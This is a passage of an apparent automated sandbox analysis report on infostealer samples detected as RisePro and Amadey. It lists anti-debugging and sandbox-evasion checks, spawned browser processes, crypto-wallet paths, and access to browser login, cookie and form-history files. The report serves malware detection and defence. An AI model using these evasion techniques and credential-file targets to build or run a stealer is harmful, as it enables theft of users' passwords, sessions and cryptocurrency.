X6vQ/9XAsTV4DSBo7dk3
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: comVMware20,11696487552o
                          Source: I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005C60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}rogramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsZZ
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o.inVMware20,11696487552~
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                          Source: MPGPH131.exe, 00000007.00000003.2284261562.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: U5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYp
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                          Source: MPGPH131.exe, 00000006.00000003.2297172525.00000000062A4000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2295544971.000000000629B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoH
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARtive Brokers - non-EU EuropeVMware20,11696487552
                          Source: I2jCDr35mu.exe, 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000006.00000002.3334513200.0000000000CB8000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000007.00000002.3207735109.0000000000CB8000.00000040.00000001.01000000.00000005.sdmp, RageMP131.exe, 00000008.00000002.2346616566.0000000000618000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 0000000F.00000002.2633807221.0000000000618000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ccount.microsoft.com/profileVMware20,11696487552u
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSystem information queried: ModuleInformationJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Hides threads from debuggers
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeThread information set: HideFromDebugger
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeThread information set: HideFromDebugger
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeThread information set: HideFromDebugger
                          Potentially malicious time measurement code found
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_04D803A0 Start: 04D80464 End: 04D804320_2_04D803A0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_04E0018A Start: 04E00242 End: 04E001B90_2_04E0018A
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_054A07D6 Start: 054A09D5 End: 054A07E56_2_054A07D6
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_0554062F Start: 0554064F End: 0554064B6_2_0554062F
                          Tries to detect sandboxes and other dynamic analysis tools (window names)
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeOpen window title or class name: regmonclass
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeOpen window title or class name: gbdyllo
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeOpen window title or class name: procmon_window_class
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeOpen window title or class name: ollydbg
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeOpen window title or class name: filemonclass
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeFile opened: NTICE
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeFile opened: SICE
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeFile opened: SIWVID
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess queried: DebugPortJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeProcess queried: DebugPort
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeProcess queried: DebugPort
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeProcess queried: DebugPort
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeProcess queried: DebugPort
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeProcess queried: DebugPort
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeProcess queried: DebugPort
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_04D10D98 rdtsc 0_2_04D10D98
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0004FAD0 mov eax, dword ptr fs:[00000030h]0_2_0004FAD0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_00044B00 mov eax, dword ptr fs:[00000030h]0_2_00044B00
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A0FAD0 mov eax, dword ptr fs:[00000030h]6_2_00A0FAD0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A04B00 mov eax, dword ptr fs:[00000030h]6_2_00A04B00
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe "C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe "C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: unknown unknownJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknownJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknownJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknownJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknownJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknownJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknown
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknown
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknown
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknown
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknown
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.youtube.com/
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.linkedin.com/login
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.facebook.com/video
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://accounts.google.com/
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/video
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
                          Source: I2jCDr35mu.exe, 00000000.00000003.2301162754.00000000060E9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2671445352.0000000006719000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2450769589.000000000679A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                          Source: I2jCDr35mu.exe, I2jCDr35mu.exe, 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, MPGPH131.exe, 00000006.00000002.3334513200.0000000000CB8000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000007.00000002.3207735109.0000000000CB8000.00000040.00000001.01000000.00000005.sdmpBinary or memory string: s&Program Manager
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0010CE0B GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_0010CE0B
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Amadeys stealer DLL
                          Source: Yara matchFile source: 51.2.MSIUpdaterV131.exe.ef0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 47.2.idPXKSo93Tb9SEEu9e8w.exe.e80000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 48.2.MSIUpdaterV131.exe.ef0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000033.00000003.2673856805.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000003.2671707007.0000000005330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000003.2504348053.0000000004E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000002.2988504929.0000000000E81000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.2726513631.0000000000EF1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000033.00000002.2815292742.0000000000EF1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                          Yara detected RisePro Stealer
                          Source: Yara matchFile source: 6.3.MPGPH131.exe.1461520.9.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000006.00000003.2506172514.0000000001446000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 1096, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 3632, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 7216, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tYPDz_TYm0NTu0Y5ud8z_nO.zip, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\up45CFBz_Ai1CiBRyRFsyfp.zip, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4enxhe06Yd_3ns7WRVTEXcO.zip, type: DROPPED
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: MPGPH131.exe, 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
                          Source: MPGPH131.exe, 00000006.00000003.2261862623.0000000001495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty Extension
                          Source: MPGPH131.exe, 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: MPGPH131.exe, 00000006.00000002.3401083597.0000000006290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: g\Ethereum\walle
                          Source: MPGPH131.exe, 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: MPGPH131.exe, 00000006.00000002.3401083597.0000000006290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: g\Ethereum\walle
                          Source: MPGPH131.exe, 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
                          Source: MPGPH131.exe, 00000006.00000003.2506172514.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger LiveGQ
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LocalPrefs.jsonJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENTJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\cookies.sqliteJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENTJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENTJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\formhistory.sqliteJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\signons.sqliteJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\logins.jsonJump to behavior
